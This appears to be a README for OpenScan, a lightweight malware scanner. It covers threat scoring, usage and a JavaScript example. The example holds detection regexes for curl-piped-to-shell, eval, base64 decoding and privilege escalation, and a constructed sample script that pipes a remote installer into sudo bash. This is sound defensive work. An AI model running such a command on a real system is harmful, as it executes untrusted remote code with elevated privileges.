OpenScan
Lightweight malware detection for macOS and Linux binaries/scripts. Ported from the Harkonnen antimalware engine.
What It Detects
Binary Analysis:
- Mach-O (macOS) and ELF (Linux) parsing
- Suspicious dylibs/shared objects (Frida, injection frameworks)
- Missing/invalid code signatures (macOS)
- Disabled security features (PIE, NX, RELRO)
- Packed/encrypted binaries (high entropy)
Pattern Detection:
- Shellcode byte sequences
- Suspicious API references (process injection, keylogging, etc.)
- Network indicators (embedded URLs, IPs)
- Encoded payloads (base64 blobs)
Script Analysis:
- Dangerous shell patterns (curl|bash, eval, etc.)
- Obfuscation indicators
- Privilege escalation attempts
Usage
```bash
# Scan a single binary
node bin/scan.js /path/to/binary

# Scan a skill folder
node bin/scan.js /path/to/skill-folder

# JSON output for automation
node bin/scan.js /path --json

# Show threats only
node bin/scan.js /path --quiet
```
Exit Codes
- `0` - Clean (score ≤ 20)
- `1` - Suspicious (score 21-60)
- `2` - High threat (score > 60)
Threat Scoring
Each file receives a score from 0-100:
| Score | Level | Meaning |
|---|---|---|
| 0-20 | CLEAN | No significant findings |
| 21-40 | LOW | Minor concerns, probably safe |
| 41-60 | MEDIUM | Suspicious patterns, review manually |
| 61-80 | HIGH | Likely malicious or dangerous |
| 81-100 | CRITICAL | Known malicious patterns |
Integration with OpenClaw
Use before installing or trusting unknown binaries:
```javascript
// Example: scan a skill's binary before allowing it
const { scanFile } = require('openscan/lib/scanner');

async function checkBinary(binPath) {
  const result = await scanFile(binPath);
  if (result.threatScore > 40) {
    throw new Error(`Binary failed security scan: ${result.findings.join(', ')}`);
  }
  return true;
}
```
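As an added example that is not OpenScan's own code, here is a minimal scoring pipeline in the README's terms: a script check for the dangerous shell patterns listed above, an entropy check for packed binaries, and the score-to-level and exit-code mapping from the tables. The pattern list, point values and the 7.2 bits/byte entropy threshold are assumptions, not the engine's actual rules.

```javascript
// Added example, not OpenScan's own code: a minimal scoring pipeline that applies the
// README's score bands and exit codes. Pattern list, point values and the 7.2 bits/byte
// entropy threshold are assumptions for illustration.
const SCRIPT_PATTERNS = [
  { re: /curl[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b/, points: 40, label: 'curl piped to shell' },
  { re: /\beval\b/, points: 25, label: 'eval' },
  { re: /base64\s+(-d|--decode)\b/, points: 20, label: 'base64 decode' },
  { re: /\b(sudo|chmod\s+[ugo]*\+s|chmod\s+[2-7][0-7]{3})\b/, points: 15, label: 'privilege escalation' },
];

// Shannon entropy of a byte buffer in bits per byte (0 = constant, 8 = uniform).
// Packed or encrypted binaries sit near the top of that range.
function shannonEntropy(buf) {
  if (buf.length === 0) return 0;
  const counts = new Array(256).fill(0);
  for (const b of buf) counts[b] += 1;
  let h = 0;
  for (const c of counts) {
    if (c === 0) continue;
    const p = c / buf.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Script analysis: each matched pattern adds its points; the score is capped at 100.
function scanScript(text) {
  const findings = [];
  let score = 0;
  for (const { re, points, label } of SCRIPT_PATTERNS) {
    if (re.test(text)) { findings.push(label); score += points; }
  }
  return { threatScore: Math.min(100, score), findings };
}

// Binary analysis (entropy check only): flag packed/encrypted content.
function scanBinary(buf) {
  const h = shannonEntropy(buf);
  const findings = h > 7.2 ? [`high entropy (${h.toFixed(2)} bits/byte)`] : [];
  return { threatScore: findings.length ? 30 : 0, findings };
}

// Map a 0-100 score to the README's level band and exit code.
function scoreToLevel(s) {
  return s <= 20 ? 'CLEAN' : s <= 40 ? 'LOW' : s <= 60 ? 'MEDIUM' : s <= 80 ? 'HIGH' : 'CRITICAL';
}
function exitCodeFor(s) { return s <= 20 ? 0 : s <= 60 ? 1 : 2; }

// Constructed sample: an installer script with a curl|bash pipe, eval and sudo.
const SAMPLE_SCRIPT = 'curl -fsSL https://example.invalid/install.sh | sudo bash\neval "$PAYLOAD"\n';
const sample = scanScript(SAMPLE_SCRIPT); // threatScore 80 → HIGH, exit code 2
```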
Limitations
- Not a replacement for full antivirus
- Signature-based detection is minimal (no hash database)
- May produce false positives on legitimate security tools
- Cannot detect all obfuscation techniques
Credits
Detection logic ported from Harkonnen antimalware engine.